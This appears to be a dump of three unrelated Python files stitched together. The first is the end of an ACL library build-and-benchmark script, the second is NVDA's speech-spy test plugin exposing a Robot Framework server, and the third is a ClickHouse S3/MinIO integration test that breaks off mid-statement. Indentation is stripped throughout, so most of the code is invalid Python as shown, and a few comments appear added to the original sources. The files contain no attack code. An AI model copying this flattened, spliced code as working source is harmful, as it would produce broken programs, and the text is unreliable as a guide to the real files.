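#   for _ in range(num_workers):
#       q.put(None)  # one sentinel per worker
#   threads = [threading.Thread(target=worker, args=(q,)) for _ in range(num_workers)]
#   for t in threads:
#       t.start()
#   for t in threads:
#       t.join()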
def do_regression_tests(build_dir, test_data_dir, args):
print('Running regression tests ...')
if args.compiler == 'android':
do_regression_tests_android(build_dir, args)
else:
do_regression_tests_cmake(test_data_dir, args)
def do_run_bench_android(build_dir, args):
# Switch our working directory to where we built everything
working_dir = os.path.join(build_dir, 'tools', 'acl_decompressor', 'main_android')
os.chdir(working_dir)
gradlew_exe = os.path.join(working_dir, 'gradlew.bat')
# We uninstall first and then install
if args.config == 'Debug':
install_cmd = 'uninstallAll installDebug'
elif args.config == 'Release':
install_cmd = 'uninstallAll installRelease'
# Install our app
test_cmd = '"{}" {}'.format(gradlew_exe, install_cmd)
result = subprocess.call(test_cmd, shell=True)
if result != 0:
sys.exit(result)
# Execute through ADB
run_cmd = 'adb shell am start -n "com.acl.decompressor/com.acl.decompressor.MainActivity" -a android.intent.action.MAIN -c android.intent.category.LAUNCHER'
result = subprocess.call(run_cmd, shell=True)
if result != 0:
sys.exit(result)
# Restore working directory
os.chdir(build_dir)
def do_pull_bench_android(build_dir):
# Grab the android directory we wrote the results to
output = str(subprocess.check_output('adb logcat -s acl -e "Benchmark results will be written to:" -m 1 -d'))
	matches = re.search(r'Benchmark results will be written to: ([/\.\w]+)', output)
	if matches is None:
print('Failed to find Android source directory from ADB')
android_src_dir = '/storage/emulated/0/Android/data/com.acl.decompressor/files'
print('{} will be used instead'.format(android_src_dir))
else:
android_src_dir = matches.group(1)
# Grab the benchmark results from the android device
dst_filename = os.path.join(build_dir, 'benchmark_results.json')
src_filename = '{}/benchmark_results.json'.format(android_src_dir)
cmd = 'adb pull "{}" "{}"'.format(src_filename, dst_filename)
os.system(cmd)
def do_run_bench_native(build_dir, test_data_dir):
if platform.system() == 'Windows':
bench_exe = os.path.join(os.getcwd(), 'bin/acl_decompressor.exe')
else:
bench_exe = os.path.join(os.getcwd(), 'bin/acl_decompressor')
current_data_dir = os.path.join(test_data_dir, current_decomp_data)
metadata_filename = os.path.join(current_data_dir, 'metadata.sjson')
benchmark_output_filename = os.path.join(build_dir, 'benchmark_results.json')
bench_cmd = '{} -metadata="{}" --benchmark_out={} --benchmark_out_format=json'.format(bench_exe, metadata_filename, benchmark_output_filename)
result = subprocess.call(bench_cmd, shell=True)
if result != 0:
sys.exit(result)
def do_run_bench(build_dir, test_data_dir, args):
if args.compiler == 'ios':
return # Not supported on iOS
print('Running benchmark ...')
if args.compiler == 'android':
do_run_bench_android(build_dir, args)
else:
do_run_bench_native(build_dir, test_data_dir)
if __name__ == "__main__":
args = parse_argv()
build_dir = os.path.join(os.getcwd(), 'build')
test_data_dir = os.path.join(os.getcwd(), 'test_data')
cmake_script_dir = os.path.join(os.getcwd(), 'cmake')
is_clean_requested = args.clean or args.clean_only
if is_clean_requested and os.path.exists(build_dir):
print('Cleaning previous build ...')
shutil.rmtree(build_dir)
if args.clean_only:
sys.exit(0)
if not os.path.exists(build_dir):
os.makedirs(build_dir)
os.chdir(build_dir)
print('Using config: {}'.format(args.config))
print('Using cpu: {}'.format(args.cpu))
if args.compiler:
print('Using compiler: {}'.format(args.compiler))
print('Using {} threads'.format(args.num_threads))
regression_data_dir = do_prepare_regression_test_data(test_data_dir, args)
decomp_data_dir = do_prepare_decompression_test_data(test_data_dir, args)
do_generate_solution(build_dir, cmake_script_dir, regression_data_dir, decomp_data_dir, args)
if args.build:
do_build(args)
if args.convert:
do_convert(test_data_dir, args)
if args.unit_test:
do_tests(build_dir, args)
if args.regression_test and not args.compiler == 'ios':
do_regression_tests(build_dir, test_data_dir, args)
if args.run_bench:
do_run_bench(build_dir, test_data_dir, args)
if args.pull_bench:
do_pull_bench_android(build_dir)
sys.exit(0)
|
speechSpyGlobalPlugin.py
|
# A part of NonVisual Desktop Access (NVDA)
# Copyright (C) 2018 NV Access Limited
# This file may be used under the terms of the GNU General Public License, version 2 or later.
# For more details see: https://www.gnu.org/licenses/gpl-2.0.html
"""This module provides an NVDA global plugin which creates a and robot library remote server.
It allows tests to get information out of NVDA.
It is copied into the (system test specific) NVDA profile directory. It becomes the '__init__.py' file as part
of a package.
"""
import typing
from typing import Optional
import globalPluginHandler
import threading
from .blockUntilConditionMet import _blockUntilConditionMet
from logHandler import log
from time import perf_counter as _timer
from keyboardHandler import KeyboardInputGesture
import inputCore
import queueHandler
import watchdog
import sys
import os
def _importRobotRemoteServer() -> typing.Type:
log.debug(f"before path mod: {sys.path}")
# Get the path to the top of the package
TOP_DIR = os.path.abspath(os.path.dirname(__file__))
# imports that require libraries not distributed with an install of NVDA
sys.path.append(os.path.join(TOP_DIR, "libs"))
log.debug(f"after path mod: {sys.path}")
from robotremoteserver import RobotRemoteServer
return RobotRemoteServer
class NVDASpyLib:
""" Robot Framework Library to spy on NVDA during system tests.
Used to determine if NVDA has finished starting, and various ways of getting speech output.
All public methods are part of the Robot Library
"""
SPEECH_HAS_FINISHED_SECONDS: float = 0.5
def __init__(self):
# speech cache is ordered temporally, oldest at low indexes, most recent at highest index.
self._nvdaSpeech_requiresLock = [ # requires thread locking before read/write
[""], # initialise with an empty string, this allows for access via [-1]. This is equiv to no speech.
]
self._lastSpeechTime_requiresLock = _timer()
#: Lock to protect members written in _onNvdaSpeech.
self._speechLock = threading.RLock()
self._isNvdaStartupComplete = False
self._allSpeechStartIndex = self.get_last_speech_index()
self._maxKeywordDuration = 30
self._registerWithExtensionPoints()
def _registerWithExtensionPoints(self):
from core import postNvdaStartup
postNvdaStartup.register(self._onNvdaStartupComplete)
# This file (`speechSpyGlobalPlugin.py`) is moved to
# "scratchpad/globalPlugins/speechSpyGlobalPlugin/__init__.py"
# Import path must be valid after `speechSpySynthDriver.py` is moved to "scratchpad/synthDrivers/"
from synthDrivers.speechSpySynthDriver import post_speech
post_speech.register(self._onNvdaSpeech)
# callbacks for extension points
def _onNvdaStartupComplete(self):
self._isNvdaStartupComplete = True
def _onNvdaSpeech(self, speechSequence=None):
if not speechSequence:
return
with self._speechLock:
self._lastSpeechTime_requiresLock = _timer()
self._nvdaSpeech_requiresLock.append(speechSequence)
@staticmethod
def _getJoinedBaseStringsFromCommands(speechCommandArray) -> str:
baseStrings = [c for c in speechCommandArray if isinstance(c, str)]
return ''.join(baseStrings).strip()
def _getSpeechAtIndex(self, speechIndex):
with self._speechLock:
return self._getJoinedBaseStringsFromCommands(self._nvdaSpeech_requiresLock[speechIndex])
def get_speech_at_index_until_now(self, speechIndex: int) -> str:
""" All speech from (and including) the index until now.
@param speechIndex:
@return: The speech joined together, see L{_getJoinedBaseStringsFromCommands}
"""
with self._speechLock:
speechCommands = [
self._getJoinedBaseStringsFromCommands(x) for x in self._nvdaSpeech_requiresLock[speechIndex:]
]
return "\n".join(x for x in speechCommands if x and not x.isspace())
def get_last_speech_index(self) -> int:
with self._speechLock:
return len(self._nvdaSpeech_requiresLock) - 1
def _getIndexOfSpeech(self, speech, searchAfterIndex: Optional[int] = None):
if searchAfterIndex is None:
firstIndexToCheck = 0
else:
firstIndexToCheck = 1 + searchAfterIndex
with self._speechLock:
for index, commands in enumerate(self._nvdaSpeech_requiresLock[firstIndexToCheck:]):
index = index + firstIndexToCheck
baseStrings = [c.strip() for c in commands if isinstance(c, str)]
if any(speech in x for x in baseStrings):
return index
return -1
def _hasSpeechFinished(self, speechStartedIndex: Optional[int] = None):
with self._speechLock:
started = speechStartedIndex is None or speechStartedIndex < self.get_next_speech_index()
finished = self.SPEECH_HAS_FINISHED_SECONDS < _timer() - self._lastSpeechTime_requiresLock
return started and finished
def _devInfoToLog(self):
import api
obj = api.getNavigatorObject()
if hasattr(obj, "devInfo"):
log.info("Developer info for navigator object:\n%s" % "\n".join(obj.devInfo))
else:
log.info("No developer info for navigator object")
def dump_speech_to_log(self):
log.debug("dump_speech_to_log.")
with self._speechLock:
try:
self._devInfoToLog()
except Exception:
log.error("Unable to log dev info")
try:
log.debug(f"All speech:\n{repr(self._nvdaSpeech_requiresLock)}")
except Exception:
log.error("Unable to log speech")
def _minTimeout(self, timeout: float) -> float:
"""Helper to get the minimum value, the timeout passed in, or self._maxKeywordDuration"""
return min(timeout, self._maxKeywordDuration)
def init_max_keyword_duration(self, maxSeconds: float):
"""This should only be called once, immediately after importing the library.
		@param maxSeconds: Should match the 'timeout' value given to the `robot.libraries.Remote` instance. If
		this value is greater than the one given to the `robot.libraries.Remote` instance, a test may fail
		without NVDA ever being exited, requiring manual intervention.
Should be set to a large value like '30' (seconds).
"""
self._maxKeywordDuration = maxSeconds - 1
def wait_for_NVDA_startup_to_complete(self):
_blockUntilConditionMet(
getValue=lambda: self._isNvdaStartupComplete,
giveUpAfterSeconds=self._minTimeout(10),
errorMessage="Unable to connect to nvdaSpy",
)
if self._isNvdaStartupComplete:
self.reset_all_speech_index()
def get_last_speech(self) -> str:
return self._getSpeechAtIndex(-1)
def get_all_speech(self) -> str:
return self.get_speech_at_index_until_now(self._allSpeechStartIndex)
def reset_all_speech_index(self) -> int:
self._allSpeechStartIndex = self.get_last_speech_index()
return self._allSpeechStartIndex
def get_next_speech_index(self) -> int:
""" @return: the next index that will be used.
"""
return self.get_last_speech_index() + 1
def wait_for_specific_speech(
self,
speech: str,
afterIndex: Optional[int] = None,
maxWaitSeconds: int = 5,
) -> int:
"""
@param speech: The speech to expect.
@param afterIndex: The speech should come after this index. The index is exclusive.
@param maxWaitSeconds: The amount of time to wait in seconds.
@return: the index of the speech.
"""
success, speechIndex = _blockUntilConditionMet(
getValue=lambda: self._getIndexOfSpeech(speech, afterIndex),
giveUpAfterSeconds=self._minTimeout(maxWaitSeconds),
shouldStopEvaluator=lambda indexFound: indexFound >= (afterIndex if afterIndex else 0),
intervalBetweenSeconds=0.1,
errorMessage=None
)
if not success:
self.dump_speech_to_log()
raise AssertionError(
"Specific speech did not occur before timeout: {}\n"
"See NVDA log for dump of all speech.".format(speech)
)
return speechIndex
def wait_for_speech_to_finish(
self,
maxWaitSeconds=5.0,
speechStartedIndex: Optional[int] = None
):
_blockUntilConditionMet(
getValue=lambda: self._hasSpeechFinished(speechStartedIndex=speechStartedIndex),
giveUpAfterSeconds=self._minTimeout(maxWaitSeconds),
errorMessage="Speech did not finish before timeout"
)
def emulateKeyPress(self, kbIdentifier: str, blockUntilProcessed=True):
"""
Emulates a key press using NVDA's input gesture framework.
The key press will either result in a script being executed, or the key being sent on to the OS.
By default this method will block until any script resulting from this key has been executed,
and the NVDA core has again gone back to sleep.
@param kbIdentifier: an NVDA keyboard gesture identifier.
0 or more modifier keys followed by a main key, all separated by a plus (+) symbol.
E.g. control+shift+downArrow.
See vkCodes.py in the NVDA source directory for valid key names.
"""
gesture = KeyboardInputGesture.fromName(kbIdentifier)
inputCore.manager.emulateGesture(gesture)
if blockUntilProcessed:
# Emulating may have queued a script or events.
# Insert our own function into the queue after, and wait for that to be also executed.
queueProcessed = set()
def _setQueueProcessed():
nonlocal queueProcessed
queueProcessed = True
queueHandler.queueFunction(queueHandler.eventQueue, _setQueueProcessed)
_blockUntilConditionMet(
getValue=lambda: queueProcessed,
giveUpAfterSeconds=self._minTimeout(5),
errorMessage="Timed out waiting for key to be processed",
)
# We know that by now the core will have woken up and processed the scripts, events and our own function.
			# Wait for the core to go to sleep,
			# which means there is nothing left that the core is currently processing.
_blockUntilConditionMet(
getValue=lambda: watchdog.isCoreAsleep(),
giveUpAfterSeconds=self._minTimeout(5),
errorMessage="Timed out waiting for core to sleep again",
)
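# A hedged usage sketch (not taken from NVDA's own test framework): the SystemTestSpyServer
# below exposes every public method of NVDASpyLib as a Robot Framework keyword over XML-RPC
# on port 8270. Driving it through a remote proxy object (called `spy` here) could look like:
#
#   spy.wait_for_NVDA_startup_to_complete()
#   index = spy.get_next_speech_index()
#   spy.emulateKeyPress("control+home")
#   spy.wait_for_speech_to_finish(speechStartedIndex=index)
#   spoken = spy.get_speech_at_index_until_now(index)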
class SystemTestSpyServer(globalPluginHandler.GlobalPlugin):
def __init__(self):
super().__init__()
self._server = None
self._start()
def _start(self):
log.debug("SystemTestSpyServer started")
spyLibrary = NVDASpyLib() # spies on NVDA
RobotRemoteServer = _importRobotRemoteServer()
server = self._server = RobotRemoteServer(
spyLibrary, # provides library behaviour
port=8270, # default:8270 is `registered by IANA` for remote server usage. Two ASCII values, RF.
serve=False # we want to start this serving on another thread so as not to block.
)
log.debug("Server address: {}".format(server.server_address))
server_thread = threading.Thread(target=server.serve)
server_thread.start()
def terminate(self):
log.debug("Terminating the SystemTestSpyServer")
self._server.stop()
GlobalPlugin = SystemTestSpyServer
GlobalPlugin.__gestures = {
}
|
test.py
|
import gzip
import json
import logging
import os
import io
import random
import threading
import time
import helpers.client
import pytest
from helpers.cluster import ClickHouseCluster, ClickHouseInstance, get_instances_dir
from helpers.network import PartitionManager
from helpers.test_tools import exec_query_with_retry
MINIO_INTERNAL_PORT = 9001
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
CONFIG_PATH = os.path.join(SCRIPT_DIR, './{}/dummy/configs/config.d/defaultS3.xml'.format(get_instances_dir()))
# Creates S3 bucket for tests and allows anonymous read-write access to it.
def prepare_s3_bucket(started_cluster):
# Allows read-write access for bucket without authorization.
bucket_read_write_policy = {"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetBucketLocation",
"Resource": "arn:aws:s3:::root"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::root"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::root/*"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:PutObject",
"Resource": "arn:aws:s3:::root/*"
}
]}
minio_client = started_cluster.minio_client
minio_client.set_bucket_policy(started_cluster.minio_bucket, json.dumps(bucket_read_write_policy))
started_cluster.minio_restricted_bucket = "{}-with-auth".format(started_cluster.minio_bucket)
if minio_client.bucket_exists(started_cluster.minio_restricted_bucket):
minio_client.remove_bucket(started_cluster.minio_restricted_bucket)
minio_client.make_bucket(started_cluster.minio_restricted_bucket)
def put_s3_file_content(started_cluster, bucket, filename, data):
buf = io.BytesIO(data)
started_cluster.minio_client.put_object(bucket, filename, buf, len(data))
# Returns content of given S3 file as string.
def get_s3_file_content(started_cluster, bucket, filename, decode=True):
# type: (ClickHouseCluster, str, str, bool) -> str
data = started_cluster.minio_client.get_object(bucket, filename)
data_str = b""
for chunk in data.stream():
data_str += chunk
if decode:
return data_str.decode()
return data_str
@pytest.fixture(scope="module")
def started_cluster():
try:
cluster = ClickHouseCluster(__file__)
cluster.add_instance("restricted_dummy", main_configs=["configs/config_for_test_remote_host_filter.xml"],
with_minio=True)
cluster.add_instance("dummy", with_minio=True, main_configs=["configs/defaultS3.xml", "configs/named_collections.xml"])
cluster.add_instance("s3_max_redirects", with_minio=True, main_configs=["configs/defaultS3.xml"],
user_configs=["configs/s3_max_redirects.xml"])
logging.info("Starting cluster...")
cluster.start()
logging.info("Cluster started")
prepare_s3_bucket(cluster)
logging.info("S3 bucket created")
run_s3_mocks(cluster)
yield cluster
finally:
cluster.shutdown()
def run_query(instance, query, stdin=None, settings=None):
# type: (ClickHouseInstance, str, object, dict) -> str
logging.info("Running query '{}'...".format(query))
result = instance.query(query, stdin=stdin, settings=settings)
logging.info("Query finished")
return result
# Test simple put. Also checks that wrong credentials produce an error with every compression method.
@pytest.mark.parametrize("maybe_auth,positive,compression", [
pytest.param("", True, 'auto', id="positive"),
pytest.param("'minio','minio123',", True, 'auto', id="auth_positive"),
pytest.param("'wrongid','wrongkey',", False, 'auto', id="auto"),
pytest.param("'wrongid','wrongkey',", False, 'gzip', id="gzip"),
pytest.param("'wrongid','wrongkey',", False, 'deflate', id="deflate"),
pytest.param("'wrongid','wrongkey',", False, 'brotli', id="brotli"),
pytest.param("'wrongid','wrongkey',", False, 'xz', id="xz"),
pytest.param("'wrongid','wrongkey',", False, 'zstd', id="zstd")
])
def test_put(started_cluster, maybe_auth, positive, compression):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket if not maybe_auth else started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 2, 3), (3, 2, 1), (78, 43, 45)"
values_csv = "1,2,3\n3,2,1\n78,43,45\n"
filename = "test.csv"
put_query = f"""insert into table function s3('http://{started_cluster.minio_ip}:{started_cluster.minio_port}/{bucket}/{filename}',
{maybe_auth}'CSV', '{table_format}', {compression}) values settings s3_truncate_on_insert=1 {values}"""
try:
run_query(instance, put_query)
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
assert values_csv == get_s3_file_content(started_cluster, bucket, filename)
def test_partition_by(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
partition_by = "column3"
values = "(1, 2, 3), (3, 2, 1), (78, 43, 45)"
filename = "test_{_partition_id}.csv"
put_query = f"""INSERT INTO TABLE FUNCTION
s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/{filename}', 'CSV', '{table_format}')
PARTITION BY {partition_by} VALUES {values}"""
run_query(instance, put_query)
assert "1,2,3\n" == get_s3_file_content(started_cluster, bucket, "test_3.csv")
assert "3,2,1\n" == get_s3_file_content(started_cluster, bucket, "test_1.csv")
assert "78,43,45\n" == get_s3_file_content(started_cluster, bucket, "test_45.csv")
filename = "test2_{_partition_id}.csv"
instance.query(f"create table p ({table_format}) engine=S3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/{filename}', 'CSV') partition by column3")
instance.query(f"insert into p values {values}")
assert "1,2,3\n" == get_s3_file_content(started_cluster, bucket, "test2_3.csv")
assert "3,2,1\n" == get_s3_file_content(started_cluster, bucket, "test2_1.csv")
assert "78,43,45\n" == get_s3_file_content(started_cluster, bucket, "test2_45.csv")
def test_partition_by_string_column(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "col_num UInt32, col_str String"
partition_by = "col_str"
values = "(1, 'foo/bar'), (3, 'йцук'), (78, '你好')"
filename = "test_{_partition_id}.csv"
put_query = f"""INSERT INTO TABLE FUNCTION
s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/{filename}', 'CSV', '{table_format}')
PARTITION BY {partition_by} VALUES {values}"""
run_query(instance, put_query)
assert '1,"foo/bar"\n' == get_s3_file_content(started_cluster, bucket, "test_foo/bar.csv")
assert '3,"йцук"\n' == get_s3_file_content(started_cluster, bucket, "test_йцук.csv")
assert '78,"你好"\n' == get_s3_file_content(started_cluster, bucket, "test_你好.csv")
def test_partition_by_const_column(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 2, 3), (3, 2, 1), (78, 43, 45)"
partition_by = "'88'"
values_csv = "1,2,3\n3,2,1\n78,43,45\n"
filename = "test_{_partition_id}.csv"
put_query = f"""INSERT INTO TABLE FUNCTION
s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/{filename}', 'CSV', '{table_format}')
PARTITION BY {partition_by} VALUES {values}"""
run_query(instance, put_query)
assert values_csv == get_s3_file_content(started_cluster, bucket, "test_88.csv")
@pytest.mark.parametrize("special", [
"space",
"plus"
])
def test_get_file_with_special(started_cluster, special):
symbol = {"space": " ", "plus": "+"}[special]
urlsafe_symbol = {"space": "%20", "plus": "%2B"}[special]
auth = "'minio','minio123',"
bucket = started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"]
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = [[12549, 2463, 19893], [64021, 38652, 66703], [81611, 39650, 83516], [11079, 59507, 61546], [51764, 69952, 6876], [41165, 90293, 29095], [40167, 78432, 48309], [81629, 81327, 11855], [55852, 21643, 98507], [6738, 54643, 41155]]
values_csv = ('\n'.join((','.join(map(str, row)) for row in values)) + '\n').encode()
filename = f"get_file_with_{special}_{symbol}two.csv"
put_s3_file_content(started_cluster, bucket, filename, values_csv)
get_query = f"SELECT * FROM s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/get_file_with_{special}_{urlsafe_symbol}two.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert [list(map(int, l.split())) for l in run_query(instance, get_query).splitlines()] == values
get_query = f"SELECT * FROM s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/get_file_with_{special}*.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert [list(map(int, l.split())) for l in run_query(instance, get_query).splitlines()] == values
get_query = f"SELECT * FROM s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/get_file_with_{special}_{urlsafe_symbol}*.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert [list(map(int, l.split())) for l in run_query(instance, get_query).splitlines()] == values
@pytest.mark.parametrize("special", [
"space",
"plus",
"plus2"
])
def test_get_path_with_special(started_cluster, special):
symbol = {"space": "%20", "plus": "%2B", "plus2": "%2B"}[special]
safe_symbol = {"space": "%20", "plus": "+", "plus2": "%2B"}[special]
auth = "'minio','minio123',"
table_format = "column1 String"
instance = started_cluster.instances["dummy"]
get_query = f"SELECT * FROM s3('http://resolver:8082/get-my-path/{safe_symbol}.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert run_query(instance, get_query).splitlines() == [f"/{symbol}.csv"]
# Test put no data to S3.
@pytest.mark.parametrize("auth", [
pytest.param("'minio','minio123',", id="minio")
])
def test_empty_put(started_cluster, auth):
# type: (ClickHouseCluster, str) -> None
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
drop_empty_table_query = "DROP TABLE IF EXISTS empty_table"
create_empty_table_query = """
CREATE TABLE empty_table (
{}
) ENGINE = Null()
""".format(table_format)
run_query(instance, drop_empty_table_query)
run_query(instance, create_empty_table_query)
filename = "empty_put_test.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') select * from empty_table".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, auth, table_format)
run_query(instance, put_query)
try:
run_query(instance, "select count(*) from s3('http://{}:{}/{}/{}', {}'CSV', '{}')".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, auth, table_format))
        assert False, "Query should have failed."
except helpers.client.QueryRuntimeException as e:
        assert str(e).find("The specified key does not exist") != -1
# Test put values in CSV format.
@pytest.mark.parametrize("maybe_auth,positive", [
pytest.param("", True, id="positive"),
pytest.param("'minio','minio123',", True, id="auth_positive"),
pytest.param("'wrongid','wrongkey',", False, id="negative"),
])
def test_put_csv(started_cluster, maybe_auth, positive):
# type: (ClickHouseCluster, bool, str) -> None
bucket = started_cluster.minio_bucket if not maybe_auth else started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') format CSV settings s3_truncate_on_insert=1".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, maybe_auth, table_format)
csv_data = "8,9,16\n11,18,13\n22,14,2\n"
try:
run_query(instance, put_query, stdin=csv_data)
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
assert csv_data == get_s3_file_content(started_cluster, bucket, filename)
# Test put and get with S3 server redirect.
def test_put_get_with_redirect(started_cluster):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
values_csv = "1,1,1\n1,1,1\n11,11,11\n"
filename = "test.csv"
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values settings s3_truncate_on_insert=1 {}".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, table_format, values)
run_query(instance, query)
assert values_csv == get_s3_file_content(started_cluster, bucket, filename)
query = "select *, column1*column2*column3 from s3('http://{}:{}/{}/{}', 'CSV', '{}')".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, table_format)
stdout = run_query(instance, query)
assert list(map(str.split, stdout.splitlines())) == [
["1", "1", "1", "1"],
["1", "1", "1", "1"],
["11", "11", "11", "1331"],
]
# Test put with restricted S3 server redirect.
def test_put_with_zero_redirect(started_cluster):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["s3_max_redirects"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
filename = "test.csv"
# Should work without redirect
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values settings s3_truncate_on_insert=1 {}".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, table_format, values)
run_query(instance, query)
# Should not work with redirect
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values settings s3_truncate_on_insert=1 {}".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, table_format, values)
exception_raised = False
try:
run_query(instance, query)
except Exception as e:
assert str(e).find("Too many redirects while trying to access") != -1
exception_raised = True
finally:
assert exception_raised
def test_put_get_with_globs(started_cluster):
# type: (ClickHouseCluster) -> None
unique_prefix = random.randint(1,10000)
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
max_path = ""
for i in range(10):
for j in range(10):
path = "{}/{}_{}/{}.csv".format(unique_prefix, i, random.choice(['a', 'b', 'c', 'd']), j)
max_path = max(path, max_path)
values = "({},{},{})".format(i, j, i + j)
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, path, table_format, values)
run_query(instance, query)
query = "select sum(column1), sum(column2), sum(column3), min(_file), max(_path) from s3('http://{}:{}/{}/{}/*_{{a,b,c,d}}/%3f.csv', 'CSV', '{}')".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, unique_prefix, table_format)
assert run_query(instance, query).splitlines() == [
"450\t450\t900\t0.csv\t{bucket}/{max_path}".format(bucket=bucket, max_path=max_path)]
minio = started_cluster.minio_client
for obj in list(minio.list_objects(started_cluster.minio_bucket, prefix='{}/'.format(unique_prefix), recursive=True)):
minio.remove_object(started_cluster.minio_bucket, obj.object_name)
# Test multipart put.
@pytest.mark.parametrize("maybe_auth,positive", [
pytest.param("", True, id="positive"),
pytest.param("'wrongid','wrongkey'", False, id="negative"),
# ("'minio','minio123',",True), Redirect with credentials not working with nginx.
])
def test_multipart_put(started_cluster, maybe_auth, positive):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket if not maybe_auth else started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
# Minimum size of part is 5 Mb for Minio.
# See: https://github.com/minio/minio/blob/master/docs/minio-limits.md
min_part_size_bytes = 5 * 1024 * 1024
csv_size_bytes = int(min_part_size_bytes * 1.5) # To have 2 parts.
one_line_length = 6 # 3 digits, 2 commas, 1 line separator.
# Generate data having size more than one part
int_data = [[1, 2, 3] for i in range(csv_size_bytes // one_line_length)]
csv_data = "".join(["{},{},{}\n".format(x, y, z) for x, y, z in int_data])
assert len(csv_data) > min_part_size_bytes
filename = "test_multipart.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') format CSV".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, maybe_auth, table_format)
try:
run_query(instance, put_query, stdin=csv_data, settings={'s3_min_upload_part_size': min_part_size_bytes,
's3_max_single_part_upload_size': 0})
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
# Use proxy access logs to count number of parts uploaded to Minio.
proxy_logs = started_cluster.get_container_logs("proxy1") # type: str
assert proxy_logs.count("PUT /{}/{}".format(bucket, filename)) >= 2
assert csv_data == get_s3_file_content(started_cluster, bucket, filename)
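# Sizing arithmetic for the multipart test above: min_part_size_bytes is 5 MiB (5,242,880 bytes),
# so csv_size_bytes = int(5,242,880 * 1.5) = 7,864,320 bytes. At 6 bytes per "1,2,3\n" row that is
# 1,310,720 rows, and with s3_min_upload_part_size set to 5 MiB the upload splits into a 5 MiB part
# plus a ~2.5 MiB remainder, which is why the proxy log is expected to show at least two part PUTs.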
def test_remote_host_filter(started_cluster):
instance = started_cluster.instances["restricted_dummy"]
format = "column1 UInt32, column2 UInt32, column3 UInt32"
query = "select *, column1*column2*column3 from s3('http://{}:{}/{}/test.csv', 'CSV', '{}')".format(
"invalid_host", MINIO_INTERNAL_PORT, started_cluster.minio_bucket, format)
assert "not allowed in configuration file" in instance.query_and_get_error(query)
other_values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
query = "insert into table function s3('http://{}:{}/{}/test.csv', 'CSV', '{}') values {}".format(
